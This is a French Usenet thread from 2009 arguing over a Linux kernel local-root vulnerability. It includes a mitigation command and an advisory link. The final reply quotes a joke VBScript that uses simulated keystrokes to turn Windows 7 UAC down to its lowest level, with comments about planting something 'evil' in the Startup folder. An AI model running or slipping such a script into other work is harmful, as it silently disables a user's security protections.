Twitter iPhone pliant OnePlus 11 PS5 Disney+ Orange Livebox Windows 11

ENORME VULNERABILITE dans LINUX

7 réponses
Avatar
P4nd1-P4nd4
C'est cool, on peut tous devenir root

http://www.theregister.co.uk/2009/11/03/linux_kernel_vulnerability/

Et on peut même pas patcher



AHAHAHAHHAHHAAAAAHAAAHAAAAAAHAAA HOOHOOOOOOOOHHHHOOO HUUUHUUUuuuHU !

Qui peut encore imaginer utilsier un truc pareil !

(Access root complete. All roots runing perfectly)

--
P4nd1-P4nd4 vous salue, et annonce que le petit ourson possède
désormais son blog
p4nd1-p4nd4.over-blog.com

7 réponses

Avatar
leeed
Le 04-11-2009, P4nd1-P4nd4 <P4nd1-P4nd4@> a écrit :
C'est cool, on peut tous devenir root

http://www.theregister.co.uk/2009/11/03/linux_kernel_vulnerability/

Et on peut même pas patcher



AHAHAHAHHAHHAAAAAHAAAHAAAAAAHAAA HOOHOOOOOOOOHHHHOOO HUUUHUUUuuuHU !

Qui peut encore imaginer utilsier un truc pareil !

(Access root complete. All roots runing perfectly)




"He's running a setuid program that allows the user to specify its own
modules. And then you people are surprised he gets local root"

"local root exploit"

What else?
Avatar
Kevin Denis
Le 04-11-2009, leeed a écrit :
http://www.theregister.co.uk/2009/11/03/linux_kernel_vulnerability/



What else?



Au hasard, par exemple:
echo 4096 > /proc/sys/vm/mmap_min_addr

Mais comme on l'a tous fait depuis quelques mois, je ne comprends pas bien
le fait de ressortir du réchauffé comme ça..
--
Kevin
Avatar
debug this fifo
Kevin Denis wrote:

http://www.theregister.co.uk/2009/11/03/linux_kernel_vulnerability/







Au hasard, par exemple:
echo 4096 > /proc/sys/vm/mmap_min_addr



mais :

"What's more, many administrators are forced to disable the
feature so their systems can run developer tools or desktop
environments such as Wine."

comme d'habitude, c'est encore cette saloperie de windows
qui vient mettre la grouille..
Avatar
remy
P4nd1-P4nd4 a écrit :
C'est cool, on peut tous devenir root

http://www.theregister.co.uk/2009/11/03/linux_kernel_vulnerability/

Et on peut même pas patcher




https://rhn.redhat.com/cve/CVE-2009-3547.html

AHAHAHAHHAHHAAAAAHAAAHAAAAAAHAAA HOOHOOOOOOOOHHHHOOO HUUUHUUUuuuHU !

Qui peut encore imaginer utilsier un truc pareil !

(Access root complete. All roots runing perfectly)





--
http://remyaumeunier.chez-alice.fr/
Avatar
debug this fifo
P4nd1-P4nd4 wrote:

AHAHAHAHHAHHAAAAAHAAAHAAAAAAHAAA HOOHOOOOOOOOHHHHOOO HUUUHUUUuuuHU !




http://www.sophos.com/blogs/chetw/g/2009/11/03/windows-7-vulnerable
t'as quoi a repondre, la ?
Avatar
Dellara
P4nd1-P4nd4 a papoté sur Usenet le novembre 4, 2009
09:40 AM:

AHAHAHAHHAHHAAAAAHAAAHAAAAAAHAAA HOOHOOOOOOOOHHHHOOO HUUUHUUUuuuHU !


Débile profond!
Avatar
NiKo
P4nd1-P4nd4 a écrit :
C'est cool, on peut tous devenir root

http://www.theregister.co.uk/2009/11/03/linux_kernel_vulnerability/

Et on peut même pas patcher



AHAHAHAHHAHHAAAAAHAAAHAAAAAAHAAA HOOHOOOOOOOOHHHHOOO HUUUHUUUuuuHU !

Qui peut encore imaginer utilsier un truc pareil !

(Access root complete. All roots runing perfectly)




Tu veux parler de celle la ?

'// 1337H4x Written by _____________
'// (12 year old)

Set WshShell = WScript.CreateObject("WScript.Shell")

'// Toggle Start menu
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)

'// Search for UAC applet
WshShell.SendKeys("change uac")
WScript.Sleep(2000)

'// Open the applet (assuming second result)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)

'// Set UAC level to lowest (assuming out-of-box Default setting)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")

'// Save our changes
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")

'// TODO: Add code to handle installation of rebound
'// process to continue exploitation, i.e. place something
'// evil in Startup folder

'// Reboot the system
'// WshShell.Run "shutdown /r /f"